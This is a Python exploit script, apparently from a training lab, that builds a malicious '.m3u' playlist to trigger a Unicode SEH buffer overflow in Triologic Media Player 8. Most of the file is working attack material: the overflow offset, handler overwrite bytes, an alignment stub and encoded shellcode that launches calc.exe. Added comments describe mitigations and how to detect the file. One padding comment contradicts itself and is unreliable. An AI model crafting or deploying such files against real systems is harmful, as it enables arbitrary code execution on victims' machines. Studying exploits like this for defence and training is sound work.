Triologic Media Player 8 Overflows (SEH_Unicode)

#!/usr/bin/python

# https://www.exploit-db.com/exploits/14673
# Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH) 
#
# Purpose of this script: write a single crafted playlist file (exploit.m3u,
# 5000 bytes, see `file` and the final padding) reproducing the public
# exploit-db PoC above.  The layout of the file is assembled in `buffer`
# below; the debugger dumps in this header are the author's working notes
# for the offset (536) and handler values used further down.
#
# NOTE(review): the script mixes Python 2 and Python 3 syntax.  The
# `print(...)` calls near the middle run on both, but the last line uses the
# Python 2 `print` statement, so the file only runs under Python 2 (as the
# shebang suggests).  Under Python 3 the last line is a SyntaxError, and the
# non-ASCII byte in `SEH` ("\xF2") would be encoded by the text-mode
# `open(file, "w")` rather than written as a raw byte, so the output would
# differ even if the print were fixed -- a Python 3 port would need "wb"
# and bytes literals throughout.
#
# NOTE(defender): the conditions this PoC depends on are stated in the
# comment above `SEH` -- the module is loaded without ASLR/rebasing and is
# not SafeSEH-compiled.  Building the target with /SAFESEH, /DYNAMICBASE and
# DEP removes the exact primitives used here.  For detection, the written
# file is a playlist consisting almost entirely of 0x41 and 0x90 filler
# (well over 4 KiB of it), which is easy to flag on ingest.
#
# SEH chain of main thread
# Address    SE handler
# 0013E270   00390072   (SEH)
# 00410038   550004C2 (nSEH)
# C95EC033   *** CORRUPT ENTRY ***
#
# ./pattern_offset.rb -q 39724138
# [*] Exact match at offset 536
#
#
# SEH chain of main thread
# Address    SE handler
# 0013E270   triomp8.00420042
# 00430043   05FC45C6
# FFFFFD74   *** CORRUPT ENTRY ***
#
#
#
# EAX : 0013E270
# EBX : 0013B410
# ECX : 0013B428
# EDX : 7C90327A     ntdll.7C90327A
# EBP : 7C9032BC     ntdll.7C9032BC
# ESP : 0013B370
# ESI : 0013E270
# EDI : 0013B3FC
# EIP : 0013E279
#reg after eSEH
# choose ebx for practice (eax is closer to our shellcode)


# Output path; written relative to the current working directory.
file = "exploit.m3u"

# Two-byte value placed at the nSEH slot of the overwritten record.
nSEH = "\x61\x6e" #popad + nop/align
#nSEH = "\x61\x41" #popad + nop/align

# 0x004a0041 : pop ebp # pop ebx # ret  | startnull,unicode,asciiprint,ascii 
#                       {PAGE_EXECUTE_READWRITE} [triomp8.exe] 
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.0.0 
# (C:\Program Files\Triologic\Triologic Media Player\triomp8.exe)
# Two-byte value placed at the SEH slot; the module address it refers to
# is only stable because of the missing ASLR/rebase noted above.
SEH = "\xF2\x41"



# msfvenom -p windows/exec cmd=calc.exe -f raw -o calc.raw -a x86
# ./alpha2 eax --unicode --uppercase < calc.raw
# Payload size: Payload size: 193 bytes
# Alphanumeric payload as produced by the two commands above; the PoC's
# effect is limited to launching calc.exe on the test machine.
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIA"
"J11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB94"
"4JBKLYXU2M0KPKP1PDIYUNQ7PQTTK0PP04KB2LLTK0RN44K2RNHLOWG0JMVNQKO"
"VLOL1QCLM2NLMPGQ8OLMM1Y7K2KBB2PW4KPRN04KOZOLTK0LN1CHYSOXM18QPQT"
"KPYO0KQYCTKOYMHK3NZOYTKOD4KKQZ6NQKOVLY18OLMM1WWP8YP3EZVM3SML8OK"
"3MNDT5JDPXTKPXMTKQJ3RFDKLLPK4KR8MLKQ8STKM4TKKQJ0SYOTNDMTQKQK1QP"
"YPZPQKOYPQO1OQJ4KMBJKTMQM1ZKQTMSUWBKPM0KPR0QXNQTKRO3WKOJ5WKJP7E"
"W2PVS8EV4UGMUMKOIEOLKVSLKZSPKK9PBULEGKPGLS2RRORJM0PSKOZ5QS1QBL2"
"CNN354835KPA")


# Banner.  These are function-style prints and work on Python 2 as well
# (a single parenthesised string), unlike the statement-style print at the
# end of the file.
print("\n\n[+] eCXD class lab - Windows SEH_Unicode Overflows")
print("[+] Triologic Media Player 8 Overflows (SEH_Unicode) --   test on XP Pro SP3 ENG")
print("[+] Chako\n\n\n")


print("[-] crafting payload...\n")



# File layout, in order: 536 filler bytes (the offset found with
# pattern_offset above), the nSEH and SEH values, two single bytes, the
# `align` stub, 59 bytes of 0x90, the shellcode, then 0x90 padding up to
# exactly 5000 bytes.
buffer = "\x41" * 536
buffer += nSEH 	            # popad + nop/align
buffer += SEH 	            # pop,pop,retn triomp8.exe unicode (universal)
buffer += "\x90"	        # 
buffer += "\x6e" 	        # venetian shellcode

# Small stub placed between the handler bytes and the shellcode; the inline
# comments are the author's annotation of each byte.
align = (
"\x53"                      #push EBX
"\x6e"                      #Venetian Padding
"\x58"                      #pop EAX
"\x6e"                      #Venetian Padding
"\x05\x37\x13"              #add eax, 0x13003700
"\x6e"                      #Venetian Padding     
"\x2d\x08\x13"              #sub eax, 0x13000800
"\x6e"                      #Venetian Padding
"\x50"                      #push EAX
"\x6e"                      #Venetian Padding
"\xC3"                      #RETN
)                #align to shellcode

 
buffer += align
buffer += "\x90" * 59
buffer +=shellcode
# Pad to a fixed 5000-byte total; this would raise if `buffer` ever
# exceeded 5000 bytes, since `"\x90" * negative` is simply "" and the
# total length would then be silently larger than intended.
buffer += "\x90" * (5000 - len(buffer))

# Text-mode write (Python 2 str == bytes here); not wrapped in `with`, so
# the handle is closed explicitly below.
f = open (file, "w")
f.write (buffer)
f.close ()
# Python 2 print statement -- see the NOTE(review) in the header.
print "[+] File saved as " + file